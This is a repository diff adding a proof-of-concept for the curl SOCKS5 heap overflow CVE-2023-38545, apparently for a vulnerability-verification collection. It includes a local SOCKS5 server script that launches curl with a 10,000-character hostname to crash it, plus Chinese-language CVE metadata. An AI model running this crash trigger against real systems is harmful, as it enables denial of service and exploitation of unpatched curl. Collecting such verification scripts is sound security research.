Pre Merge pull request !466 from LI, WENJIE/master

2023-10-19 08:35:28 +00:00 · 2023-10-19 08:35:28 +00:00 · 6987e2c3e6
parent 314eb60d6e 4e7b7805e3
commit 6987e2c3e6
4 changed files with 114 additions and 0 deletions
--- a/cve/curl/2023/CVE-2023-38545/CVE-2023-38545.py
+++ b/cve/curl/2023/CVE-2023-38545/CVE-2023-38545.py
@ -0,0 +1,89 @@
+import socket
+import os
+import threading
+import sys
+# chatgpt生成简易的socks服务
+def start_server(host, port):
+    # 创建监听socket
+    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    server_socket.bind((host, port))
+    server_socket.listen(1)
+    #print(f'Socks5 proxy server started on {host}:{port}')
+
+    while True:
+        # 接受客户端连接
+        client_socket, client_address = server_socket.accept()
+        #print(f'Accepted connection from {client_address[0]}:{client_address[1]}')
+
+        # 处理客户端请求
+        data = client_socket.recv(4096)
+        # 实现Socks5协议的握手过程
+        client_socket.send(b'\x05\x00')
+        data = client_socket.recv(4096)
+        # 解析客户端请求
+        version = data[0]
+        cmd = data[1]
+        addrtype = data[3]
+        if addrtype == 1:
+            # IPv4地址类型
+            dest_addr = socket.inet_ntoa(data[4:8])
+            dest_port = int.from_bytes(data[8:10], byteorder='big')
+        elif addrtype == 3:
+            # 域名地址类型
+            dest_addr_len = data[4]
+            dest_addr = data[5:5+dest_addr_len]
+            dest_port = int.from_bytes(data[5+dest_addr_len:7+dest_addr_len], byteorder='big')
+        else:
+            # 不支持的地址类型
+            client_socket.close()
+            continue
+
+        # 连接目标服务器
+        server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        server_socket.connect((dest_addr, dest_port))
+
+        # 响应客户端连接成功
+        reply = b'\x05\x00\x00\x01'
+        reply += socket.inet_aton('0.0.0.0') + (port).to_bytes(2, byteorder='big')
+        client_socket.send(reply)
+
+        # 进行数据转发
+        while True:
+            data = client_socket.recv(4096)
+            if len(data) == 0:
+                break
+            server_socket.sendall(data)
+
+        # 关闭连接
+        client_socket.close()
+        server_socket.close()
+        
+def poc():
+    command_parts = [
+        "curl",
+        "--limit-rate", "1025",
+        "-vvv",
+        "-x", "socks5h://127.0.0.1:10801",
+        "$(python3 -c \"print(('A'*10000), end='')\")"
+    ]
+    command = " ".join(command_parts)
+
+    # 执行命令
+    exit_code = os.system(command) >> 8
+    #print(f"命令的退出状态码：{exit_code}")
+    return exit_code
+
+
+
+if __name__ == '__main__':
+    for _ in range(50):
+    # 启动服务器的线程
+        server_thread = threading.Thread(target=start_server, args=('127.0.0.1', 10801))
+        server_thread.start()
+        sys.stderr = open(os.devnull, 'w')
+        # 执行 poc
+        exit_code=poc()
+        if exit_code==134 or exit_code==139:
+            print('status:successfully')
+            sys.exit()    
+    print('status:failed')
--- a/cve/curl/2023/CVE-2023-38545/README.md
+++ b/cve/curl/2023/CVE-2023-38545/README.md
@ -0,0 +1,4 @@
+## 漏洞验证
+'''
+python3 CVE-2023-38545.py
+'''
--- a/cve/curl/2023/yaml/CVE-2023-38545.yaml
+++ b/cve/curl/2023/yaml/CVE-2023-38545.yaml
@ -0,0 +1,19 @@
+id: CVE-2023-38545
+source: 
+info:
+  name: curl是一款用于从服务器传输数据或向服务器传输数据的工具。
+  severity: High
+  description: |
+    当要求curl将主机名传给SOCKS5代理进行地址解析时，若主机名超过255字节，curl将会发生基于堆的缓冲区溢出。由于在缓慢的SOCKS5握手中，一个本地变量可能会产生错误值，导致curl不是复制已解析的地址，而是复制过长的主机名至目标缓冲区。此漏洞同时影响命令行工具curl和依赖库libcurl。
+  scope-of-influence:
+    7.69.0<=curl<=8.3.0
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-38545
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2023-38545
+    cwe-id: CWE-787
+    cnvd-id: None
+    kve-id: None
+  tags: cve2023, 缓冲区溢出
--- a/other_list.yaml
+++ b/other_list.yaml
@ -73,4 +73,6 @@ cve:
    - CVE-2023-21752 
  glibc:
    - CVE-2023-4911
+  curl:
+    - CVE-2023-38545
 cnvd: